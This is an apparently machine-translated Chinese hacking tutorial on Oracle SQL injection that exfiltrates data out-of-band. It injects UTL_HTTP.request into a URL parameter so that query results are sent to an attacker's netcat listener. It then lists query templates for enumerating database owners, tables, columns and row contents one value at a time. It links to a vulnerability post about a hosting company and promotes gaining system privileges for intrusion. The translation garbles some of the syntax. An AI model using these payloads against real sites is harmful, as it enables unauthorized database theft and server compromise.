Oracle injection technology-Oracle + nc Injection

Author: Kindle
MSN: Kindle@live.cn
Blog: http://hi.baidu.com/system_exp
Team: Security Team (http://bbs.exploits.com.cn)

First, the Internet nc listens to the corresponding port

The url statement is as follows:

Http://www.exploits.com.cn/Kindle? Jsp = 1 and UTL_HTTP.request (Internet ip: port/| (SQL statement) = 1 --

The content is as follows:

And UTL_HTTP.request (Internet ip: port/| (SQL statement) = 1 --
Database explosion:

Select owner from all_tables where rownum = 1

Select owner from all_tables where owner <> first database name and rownum = 1

Select owner from all_tables where owner <> first database name and owner <> second and rownum = 1

Select owner from all_tables where owner <> first database name and rownum = 1

On this basis

Burst table:

Select TABLE_NAME from all_tables where owner = Database Name and rownum = 1

Select TABLE_NAME from all_tables where owner = Database Name and rownum = 1 and TABLE_NAME <> table name 1

Select TABLE_NAME from all_tables where owner = Database Name and rownum = 1 and TABLE_NAME <> table name 1 and TABLE_NAME <> table name 2

On this basis

Burst columns:

Select COLUMN_NAME from user_tab_columns where table_name = table name and rownum = 1

Select COLUMN_NAME from user_tab_columns where table_name = table name and rownum = 1 and COLUMN_NAME <> first column name popped up

Select COLUMN_NAME from user_tab_columns where table_name = table name and rownum = 1 and COLUMN_NAME <> first column name and COLUMN_NAME <> second column name

Burst content:

First content: select column name from table name where rownum = 1

Second content: select column name from table name where rownum = 1 and column name <> first value

Third content: select column name from table name where rownum = 1 and column name <> first value and column name <> second value

On this basis

Now we turn around to look at the "hichina embarrassing-web ORACLE injection vulnerability exposure" http://bbs.exploits.com.cn/read.php? Tid-144.html

Is it clear that... o (∩ _ ∩) o... haha

Note:
1: In windows, oracle is started as a service, so that the system permission can be directly obtained through web injection (this part of content is being sorted and tested, to provide more intuitive, concise, and effective reference materials
2: Oracle will also be analyzed for unix and linux operating systems. I believe Oracle injection will become a bridge for advanced Hack intrusion.
3. This is a series of articles to be updated later